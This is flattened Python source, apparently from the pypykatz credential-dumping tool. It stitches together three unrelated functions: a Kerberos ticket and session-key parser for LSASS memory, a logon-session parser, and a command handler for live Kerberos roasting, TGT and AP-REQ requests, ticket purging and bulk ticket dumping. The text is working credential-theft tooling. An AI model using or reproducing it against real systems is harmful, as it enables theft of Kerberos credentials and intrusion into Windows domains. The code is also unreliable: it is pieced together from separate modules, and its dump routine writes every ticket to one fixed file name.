async def aparse(kerberos_ticket, reader, sysinfo, type=None): kt = KerberosTicket() kt.type = type x = await kerberos_ticket.ServiceName.read(reader) kt.ServiceName_type = x.NameType x = await kerberos_ticket.ServiceName.read(reader) kt.ServiceName = await x.read(reader) kt.DomainName = await kerberos_ticket.DomainName.read_string(reader) x = await kerberos_ticket.TargetName.read(reader) if x: y = await kerberos_ticket.TargetName.read(reader) kt.ETargetName = await y.read(reader) y = await kerberos_ticket.TargetName.read(reader) kt.ETargetName_type = y.NameType kt.TargetDomainName = await kerberos_ticket.TargetDomainName.read_string( reader) x = await kerberos_ticket.ClientName.read(reader) kt.EClientName = await x.read(reader) x = await kerberos_ticket.ClientName.read(reader) kt.EClientName_type = x.NameType kt.AltTargetDomainName = await kerberos_ticket.AltTargetDomainName.read_string( reader) kt.Description = await kerberos_ticket.Description.read_string(reader) kt.StartTime = filetime_to_dt(kerberos_ticket.StartTime) kt.EndTime = filetime_to_dt(kerberos_ticket.EndTime) if kerberos_ticket.RenewUntil == 0: kt.RenewUntil = datetime.datetime(1970, 1, 1, 0, 0, tzinfo=datetime.timezone.utc) else: kt.RenewUntil = filetime_to_dt(kerberos_ticket.RenewUntil) kt.KeyType = kerberos_ticket.KeyType kt.Key = await kerberos_ticket.Key.read(reader) kt.session_key = KerberosSessionKey.parse(kerberos_ticket.Key, sysinfo) kt.TicketFlags = kerberos_ticket.TicketFlags kt.TicketEncType = kerberos_ticket.TicketEncType kt.TicketKvno = kerberos_ticket.TicketKvno kt.Ticket = await kerberos_ticket.Ticket.read(reader) kirbi = kt.to_asn1() kt.kirbi_data[kt.generate_filename()] = kirbi return kt
def parse(entry, reader): """ Converts KIWI_MSV1_0_LIST type objects into a unified class """ lsc = LogonSession() lsc.authentication_id = entry.LocallyUniqueIdentifier lsc.session_id = entry.Session lsc.username = entry.UserName.read_string(reader) lsc.domainname = entry.Domaine.read_string(reader) lsc.logon_server = entry.LogonServer.read_string(reader) if entry.LogonTime != 0: lsc.logon_time = filetime_to_dt(entry.LogonTime).isoformat() lsc.sid = str(entry.pSid.read(reader)) lsc.luid = entry.LocallyUniqueIdentifier return lsc
def run_live(self, args): if platform.system() != 'Windows': print('[-]This command only works on Windows!') return from pypykatz.kerberos.kerberoslive import KerberosLive, live_roast # , purge, list_sessions #get_tgt, get_tgs kl = KerberosLive() if args.live_kerberos_module == 'roast': res, errors, err = asyncio.run(live_roast(args.out_file)) if err is not None: print('[LIVE][KERBEROS][ROAST] Error while roasting tickets! Reason: %s' % geterr(err)) return if args.out_file is None: for r in res: print(r) elif args.live_kerberos_module == 'tgt': ticket = kl.get_tgt(args.target) if args.out_file is None: print_kirbi(ticket) return with open(args.out_file, 'wb') as f: f.write(ticket) elif args.live_kerberos_module == 'apreq': apreq, sessionkey = kl.get_apreq(args.target) print('APREQ b64: ') print(format_kirbi(apreq.dump())) print('Sessionkey b64: %s' % base64.b64encode(sessionkey).decode()) elif args.live_kerberos_module == 'currentluid': print(hex(kl.get_current_luid())) elif args.live_kerberos_module == 'purge': luid = None if args.luid is not None: luid = args.luid if luid.startswith('0x') is True: luid = int(luid, 16) luid=int(luid) kl.purge(luid) print('Tickets purged!') elif args.live_kerberos_module == 'sessions': kl.list_sessions() elif args.live_kerberos_module == 'triage': if args.luid is None: ticketinfos = kl.get_all_ticketinfo() else: luid = KerberosCMDHelper.luid_converter(args.luid) ticketinfos = kl.get_ticketinfo(luid) table = [['LUID', 'ServerName', 'RealmName', 'StartTime', 'EndTime', 'RenewTime', 'EncryptionType', 'TicketFlags']] for luid in ticketinfos: if len(ticketinfos[luid]) == 0: continue for ticket in ticketinfos[luid]: table.append([ hex(luid), ticket['ServerName'], ticket['RealmName'], filetime_to_dt(ticket['StartTime']).isoformat(), filetime_to_dt(ticket['EndTime']).isoformat(), filetime_to_dt(ticket['RenewTime']).isoformat(), str(ticket['EncryptionType']), str(ticket['TicketFlags']) ]) print_table(table) elif args.live_kerberos_module == 'dump': if args.luid is None: tickets = kl.export_all_ticketdata() else: luid = KerberosCMDHelper.luid_converter(args.luid) tickets = kl.export_ticketdata(luid) if args.outdir is not None: for luid in tickets: for ticket in tickets[luid]: with open(args.outdir + 'ticket_%s.kirbi' % 'a', 'wb') as f: f.write(ticket['Ticket']) else: for luid in tickets: if len(tickets[luid]) == 0: continue print('LUID @%s' % hex(luid)) for ticket in tickets[luid]: print_kirbi(ticket['Ticket'])